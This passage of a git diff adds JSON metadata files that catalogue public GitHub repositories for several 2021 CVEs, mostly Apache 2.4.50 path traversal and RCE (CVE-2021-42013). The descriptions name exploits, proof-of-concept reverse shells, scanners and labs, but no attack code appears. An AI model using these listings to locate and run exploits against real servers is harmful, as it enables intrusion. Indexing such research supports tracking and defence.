+ "full_name": "afaq1337\/CVE-2021-41946",
+ "owner": {
+ "login": "afaq1337",
+ "id": 45089292,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45089292?v=4",
+ "html_url": "https:\/\/github.com\/afaq1337"
+ },
+ "html_url": "https:\/\/github.com\/afaq1337\/CVE-2021-41946",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-17T15:23:12Z",
+ "updated_at": "2022-05-17T15:23:12Z",
+ "pushed_at": "2023-12-31T06:40:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41962.json b/2021/CVE-2021-41962.json
new file mode 100644
index 0000000000..aa06f738dc
--- /dev/null
+++ b/2021/CVE-2021-41962.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 438955513,
+ "name": "-CVE-2021-41962",
+ "full_name": "lohyt\/-CVE-2021-41962",
+ "owner": {
+ "login": "lohyt",
+ "id": 11375930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11375930?v=4",
+ "html_url": "https:\/\/github.com\/lohyt"
+ },
+ "html_url": "https:\/\/github.com\/lohyt\/-CVE-2021-41962",
+ "description": "Stored XSS found in Vehicle Service Management System 1.0 application in Sourcecodester.",
+ "fork": false,
+ "created_at": "2021-12-16T10:52:13Z",
+ "updated_at": "2021-12-16T10:59:21Z",
+ "pushed_at": "2021-12-16T10:59:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42008.json b/2021/CVE-2021-42008.json
new file mode 100644
index 0000000000..b2f70fc4e9
--- /dev/null
+++ b/2021/CVE-2021-42008.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 434603103,
+ "name": "CVE-2021-42008",
+ "full_name": "numanturle\/CVE-2021-42008",
+ "owner": {
+ "login": "numanturle",
+ "id": 7007951,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4",
+ "html_url": "https:\/\/github.com\/numanturle"
+ },
+ "html_url": "https:\/\/github.com\/numanturle\/CVE-2021-42008",
+ "description": "Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver",
+ "fork": false,
+ "created_at": "2021-12-03T13:18:32Z",
+ "updated_at": "2023-09-28T11:33:44Z",
+ "pushed_at": "2021-12-03T13:19:26Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 434618356,
+ "name": "CVE-2021-42008",
+ "full_name": "0xdevil\/CVE-2021-42008",
+ "owner": {
+ "login": "0xdevil",
+ "id": 52781556,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52781556?v=4",
+ "html_url": "https:\/\/github.com\/0xdevil"
+ },
+ "html_url": "https:\/\/github.com\/0xdevil\/CVE-2021-42008",
+ "description": "CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver",
+ "fork": false,
+ "created_at": "2021-12-03T14:08:26Z",
+ "updated_at": "2023-11-07T19:09:54Z",
+ "pushed_at": "2022-05-01T15:02:44Z",
+ "stargazers_count": 30,
+ "watchers_count": 30,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 30,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42013.json b/2021/CVE-2021-42013.json
new file mode 100644
index 0000000000..f9f6f30f06
--- /dev/null
+++ b/2021/CVE-2021-42013.json
@@ -0,0 +1,906 @@
+[
+ {
+ "id": 414715774,
+ "name": "apache-exploit-CVE-2021-42013",
+ "full_name": "andrea-mattioli\/apache-exploit-CVE-2021-42013",
+ "owner": {
+ "login": "andrea-mattioli",
+ "id": 5707570,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5707570?v=4",
+ "html_url": "https:\/\/github.com\/andrea-mattioli"
+ },
+ "html_url": "https:\/\/github.com\/andrea-mattioli\/apache-exploit-CVE-2021-42013",
+ "description": "Exploit with integrated shodan search",
+ "fork": false,
+ "created_at": "2021-10-07T18:31:29Z",
+ "updated_at": "2022-09-21T11:39:27Z",
+ "pushed_at": "2021-10-08T13:18:55Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414860866,
+ "name": "cve-2021-42013",
+ "full_name": "Vulnmachines\/cve-2021-42013",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/cve-2021-42013",
+ "description": "Apache 2.4.50 Path traversal vulnerability",
+ "fork": false,
+ "created_at": "2021-10-08T05:44:54Z",
+ "updated_at": "2023-12-11T06:17:20Z",
+ "pushed_at": "2022-08-30T11:59:18Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 417233035,
+ "name": "cve-2021-42013-docker-lab",
+ "full_name": "twseptian\/cve-2021-42013-docker-lab",
+ "owner": {
+ "login": "twseptian",
+ "id": 9025301,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4",
+ "html_url": "https:\/\/github.com\/twseptian"
+ },
+ "html_url": "https:\/\/github.com\/twseptian\/cve-2021-42013-docker-lab",
+ "description": "Docker container lab to play\/learn with CVE-2021-42013",
+ "fork": false,
+ "created_at": "2021-10-14T18:00:48Z",
+ "updated_at": "2023-10-18T07:48:46Z",
+ "pushed_at": "2022-02-09T17:27:53Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-42013",
+ "dockerfile",
+ "path-traversal-exploitation"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 419389200,
+ "name": "CVE-2021-42013",
+ "full_name": "LayarKacaSiber\/CVE-2021-42013",
+ "owner": {
+ "login": "LayarKacaSiber",
+ "id": 92864439,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92864439?v=4",
+ "html_url": "https:\/\/github.com\/LayarKacaSiber"
+ },
+ "html_url": "https:\/\/github.com\/LayarKacaSiber\/CVE-2021-42013",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-20T15:32:39Z",
+ "updated_at": "2021-10-23T13:16:56Z",
+ "pushed_at": "2021-10-23T13:16:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420531710,
+ "name": "CVE-2021-42013",
+ "full_name": "TheLastVvV\/CVE-2021-42013",
+ "owner": {
+ "login": "TheLastVvV",
+ "id": 71128830,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71128830?v=4",
+ "html_url": "https:\/\/github.com\/TheLastVvV"
+ },
+ "html_url": "https:\/\/github.com\/TheLastVvV\/CVE-2021-42013",
+ "description": "Poc CVE-2021-42013 - Apache 2.4.50 without CGI",
+ "fork": false,
+ "created_at": "2021-10-23T21:58:44Z",
+ "updated_at": "2022-08-29T22:56:33Z",
+ "pushed_at": "2021-10-23T22:00:34Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420684825,
+ "name": "CVE-2021-42013_Reverse-Shell",
+ "full_name": "TheLastVvV\/CVE-2021-42013_Reverse-Shell",
+ "owner": {
+ "login": "TheLastVvV",
+ "id": 71128830,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71128830?v=4",
+ "html_url": "https:\/\/github.com\/TheLastVvV"
+ },
+ "html_url": "https:\/\/github.com\/TheLastVvV\/CVE-2021-42013_Reverse-Shell",
+ "description": "PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI",
+ "fork": false,
+ "created_at": "2021-10-24T12:57:55Z",
+ "updated_at": "2024-04-19T09:39:57Z",
+ "pushed_at": "2021-10-24T13:26:02Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 421851715,
+ "name": "cve-2021-42013",
+ "full_name": "walnutsecurity\/cve-2021-42013",
+ "owner": {
+ "login": "walnutsecurity",
+ "id": 92915142,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92915142?v=4",
+ "html_url": "https:\/\/github.com\/walnutsecurity"
+ },
+ "html_url": "https:\/\/github.com\/walnutsecurity\/cve-2021-42013",
+ "description": "cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50",
+ "fork": false,
+ "created_at": "2021-10-27T14:29:10Z",
+ "updated_at": "2024-06-24T19:24:16Z",
+ "pushed_at": "2023-01-23T16:41:56Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 424321579,
+ "name": "CVE-2021-42013",
+ "full_name": "robotsense1337\/CVE-2021-42013",
+ "owner": {
+ "login": "robotsense1337",
+ "id": 84665951,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84665951?v=4",
+ "html_url": "https:\/\/github.com\/robotsense1337"
+ },
+ "html_url": "https:\/\/github.com\/robotsense1337\/CVE-2021-42013",
+ "description": "Exploit Apache 2.4.50(CVE-2021-42013)",
+ "fork": false,
+ "created_at": "2021-11-03T17:33:52Z",
+ "updated_at": "2021-11-04T04:50:20Z",
+ "pushed_at": "2021-11-03T17:41:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 427958357,
+ "name": "CVE-2021-42013-ApacheRCE",
+ "full_name": "xMohamed0\/CVE-2021-42013-ApacheRCE",
+ "owner": {
+ "login": "xMohamed0",
+ "id": 94008154,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94008154?v=4",
+ "html_url": "https:\/\/github.com\/xMohamed0"
+ },
+ "html_url": "https:\/\/github.com\/xMohamed0\/CVE-2021-42013-ApacheRCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-14T14:58:26Z",
+ "updated_at": "2021-11-14T14:59:00Z",
+ "pushed_at": "2021-11-14T14:58:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441210162,
+ "name": "CVE-2021-42013-Apache-RCE-Poc-Exp",
+ "full_name": "asaotomo\/CVE-2021-42013-Apache-RCE-Poc-Exp",
+ "owner": {
+ "login": "asaotomo",
+ "id": 67818638,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67818638?v=4",
+ "html_url": "https:\/\/github.com\/asaotomo"
+ },
+ "html_url": "https:\/\/github.com\/asaotomo\/CVE-2021-42013-Apache-RCE-Poc-Exp",
+ "description": "Apache 远程代码执行 (CVE-2021-42013)批量检测工具:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。",
+ "fork": false,
+ "created_at": "2021-12-23T14:46:41Z",
+ "updated_at": "2023-03-06T08:42:18Z",
+ "pushed_at": "2021-12-24T07:38:39Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve-2021-42013",
+ "exp",
+ "poc",
+ "python3"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 445382835,
+ "name": "CVE-2021-42013",
+ "full_name": "rnsss\/CVE-2021-42013",
+ "owner": {
+ "login": "rnsss",
+ "id": 48343279,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48343279?v=4",
+ "html_url": "https:\/\/github.com\/rnsss"
+ },
+ "html_url": "https:\/\/github.com\/rnsss\/CVE-2021-42013",
+ "description": "CVE-2021-42013-exp",
+ "fork": false,
+ "created_at": "2022-01-07T03:12:45Z",
+ "updated_at": "2022-01-07T03:12:50Z",
+ "pushed_at": "2022-01-07T03:12:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 455174932,
+ "name": "CVE-2021-42013-LAB",
+ "full_name": "jas9reet\/CVE-2021-42013-LAB",
+ "owner": {
+ "login": "jas9reet",
+ "id": 34741406,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34741406?v=4",
+ "html_url": "https:\/\/github.com\/jas9reet"
+ },
+ "html_url": "https:\/\/github.com\/jas9reet\/CVE-2021-42013-LAB",
+ "description": "Apache HTTP Server 2.4.50 - RCE Lab",
+ "fork": false,
+ "created_at": "2022-02-03T13:26:05Z",
+ "updated_at": "2022-02-20T23:15:08Z",
+ "pushed_at": "2022-06-06T06:09:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 466011549,
+ "name": "CVE-2022-22947-Spring-Cloud-Gateway",
+ "full_name": "tangxiaofeng7\/CVE-2022-22947-Spring-Cloud-Gateway",
+ "owner": {
+ "login": "tangxiaofeng7",
+ "id": 45926593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4",
+ "html_url": "https:\/\/github.com\/tangxiaofeng7"
+ },
+ "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2022-22947-Spring-Cloud-Gateway",
+ "description": "CVE-2021-42013批量",
+ "fork": false,
+ "created_at": "2022-03-04T06:38:26Z",
+ "updated_at": "2024-06-21T00:09:54Z",
+ "pushed_at": "2022-03-04T10:49:00Z",
+ "stargazers_count": 70,
+ "watchers_count": 70,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 70,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 467686191,
+ "name": "CVE-2021-42013",
+ "full_name": "mauricelambert\/CVE-2021-42013",
+ "owner": {
+ "login": "mauricelambert",
+ "id": 50479118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4",
+ "html_url": "https:\/\/github.com\/mauricelambert"
+ },
+ "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2021-42013",
+ "description": "These Nmap, Python and Ruby scripts detects and exploits CVE-2021-42013 with RCE and local file disclosure.",
+ "fork": false,
+ "created_at": "2022-03-08T21:48:40Z",
+ "updated_at": "2022-03-23T16:46:10Z",
+ "pushed_at": "2022-03-14T07:36:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-42013",
+ "detection",
+ "exploit",
+ "metasploit",
+ "nmap",
+ "python3",
+ "rce",
+ "ruby",
+ "scanner",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 469575892,
+ "name": "CVE-2021-42013",
+ "full_name": "honypot\/CVE-2021-42013",
+ "owner": {
+ "login": "honypot",
+ "id": 101309325,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4",
+ "html_url": "https:\/\/github.com\/honypot"
+ },
+ "html_url": "https:\/\/github.com\/honypot\/CVE-2021-42013",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-14T04:08:24Z",
+ "updated_at": "2022-03-14T04:20:42Z",
+ "pushed_at": "2022-03-14T04:08:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 479265759,
+ "name": "CVE-2021-42013",
+ "full_name": "Adashz\/CVE-2021-42013",
+ "owner": {
+ "login": "Adashz",
+ "id": 70690472,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70690472?v=4",
+ "html_url": "https:\/\/github.com\/Adashz"
+ },
+ "html_url": "https:\/\/github.com\/Adashz\/CVE-2021-42013",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-08T06:07:37Z",
+ "updated_at": "2022-04-08T06:08:55Z",
+ "pushed_at": "2022-04-08T07:07:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 482976975,
+ "name": "apache_2.4.50",
+ "full_name": "hadrian3689\/apache_2.4.50",
+ "owner": {
+ "login": "hadrian3689",
+ "id": 71423134,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4",
+ "html_url": "https:\/\/github.com\/hadrian3689"
+ },
+ "html_url": "https:\/\/github.com\/hadrian3689\/apache_2.4.50",
+ "description": "CVE-2021-42013 - Apache 2.4.50",
+ "fork": false,
+ "created_at": "2022-04-18T19:49:14Z",
+ "updated_at": "2023-01-04T20:25:41Z",
+ "pushed_at": "2022-09-20T15:30:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 498173029,
+ "name": "cve-2021-42013",
+ "full_name": "viliuspovilaika\/cve-2021-42013",
+ "owner": {
+ "login": "viliuspovilaika",
+ "id": 10381655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10381655?v=4",
+ "html_url": "https:\/\/github.com\/viliuspovilaika"
+ },
+ "html_url": "https:\/\/github.com\/viliuspovilaika\/cve-2021-42013",
+ "description": "Exploit for Apache 2.4.50 (CVE-2021-42013)",
+ "fork": false,
+ "created_at": "2022-05-31T03:28:20Z",
+ "updated_at": "2022-05-31T03:29:22Z",
+ "pushed_at": "2022-05-31T04:37:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 536994874,
+ "name": "cve-2021-42013",
+ "full_name": "mightysai1997\/cve-2021-42013",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-42013",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T11:28:39Z",
+ "updated_at": "2022-09-15T11:28:51Z",
+ "pushed_at": "2022-09-15T11:28:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 536997164,
+ "name": "cve-2021-42013L",
+ "full_name": "mightysai1997\/cve-2021-42013L",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-42013L",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T11:35:00Z",
+ "updated_at": "2022-09-15T11:35:00Z",
+ "pushed_at": "2022-09-15T11:35:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 537011231,
+ "name": "cve-2021-42013.get",
+ "full_name": "mightysai1997\/cve-2021-42013.get",
+ "owner": {
+ "login": "mightysai1997",
+ "id": 110396758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4",
+ "html_url": "https:\/\/github.com\/mightysai1997"
+ },
+ "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-42013.get",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-09-15T12:15:00Z",
+ "updated_at": "2022-09-15T12:15:18Z",
+ "pushed_at": "2022-09-15T12:15:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 567841093,
+ "name": "CVE-2021-42013",
+ "full_name": "12345qwert123456\/CVE-2021-42013",
+ "owner": {
+ "login": "12345qwert123456",
+ "id": 63474188,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63474188?v=4",
+ "html_url": "https:\/\/github.com\/12345qwert123456"
+ },
+ "html_url": "https:\/\/github.com\/12345qwert123456\/CVE-2021-42013",
+ "description": "Vulnerable configuration Apache HTTP Server version 2.4.49\/2.4.50",
+ "fork": false,
+ "created_at": "2022-11-18T17:53:46Z",
+ "updated_at": "2024-05-28T07:50:29Z",
+ "pushed_at": "2022-11-21T17:10:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve",
+ "cve-2021-42013",
+ "docker",
+ "http-server",
+ "lfi",
+ "rce",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 650990250,
+ "name": "cve-2021-42013-httpd",
+ "full_name": "cybfar\/cve-2021-42013-httpd",
+ "owner": {
+ "login": "cybfar",
+ "id": 96472592,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96472592?v=4",
+ "html_url": "https:\/\/github.com\/cybfar"
+ },
+ "html_url": "https:\/\/github.com\/cybfar\/cve-2021-42013-httpd",
+ "description": "CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Path Traversal or Remote Code Execution vulnerabilities in Apache 2.4.49 and 2.4.50",
+ "fork": false,
+ "created_at": "2023-06-08T08:49:15Z",
+ "updated_at": "2023-06-17T13:52:36Z",
+ "pushed_at": "2023-06-08T09:34:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 656394946,
+ "name": "CVE-2021-42013",
+ "full_name": "vudala\/CVE-2021-42013",
+ "owner": {
+ "login": "vudala",
+ "id": 66208251,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66208251?v=4",
+ "html_url": "https:\/\/github.com\/vudala"
+ },
+ "html_url": "https:\/\/github.com\/vudala\/CVE-2021-42013",
+ "description": "Exploring CVE-2021-42013, using Suricata and OpenVAS to gather info",
+ "fork": false,
+ "created_at": "2023-06-20T21:43:13Z",
+ "updated_at": "2023-11-22T14:25:04Z",
+ "pushed_at": "2023-06-22T05:15:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 658610521,
+ "name": "CVE-2021-42013",
+ "full_name": "birdlinux\/CVE-2021-42013",
+ "owner": {
+ "login": "birdlinux",
+ "id": 123122904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123122904?v=4",
+ "html_url": "https:\/\/github.com\/birdlinux"
+ },
+ "html_url": "https:\/\/github.com\/birdlinux\/CVE-2021-42013",
+ "description": "Apache 2.4.50 Automated Remote Code Execution and Path traversal",
+ "fork": false,
+ "created_at": "2023-06-26T06:39:57Z",
+ "updated_at": "2023-06-26T06:44:47Z",
+ "pushed_at": "2023-06-26T06:44:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 660279030,
+ "name": "CVE-2021-42013",
+ "full_name": "Hamesawian\/CVE-2021-42013",
+ "owner": {
+ "login": "Hamesawian",
+ "id": 67901852,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67901852?v=4",
+ "html_url": "https:\/\/github.com\/Hamesawian"
+ },
+ "html_url": "https:\/\/github.com\/Hamesawian\/CVE-2021-42013",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-29T16:32:44Z",
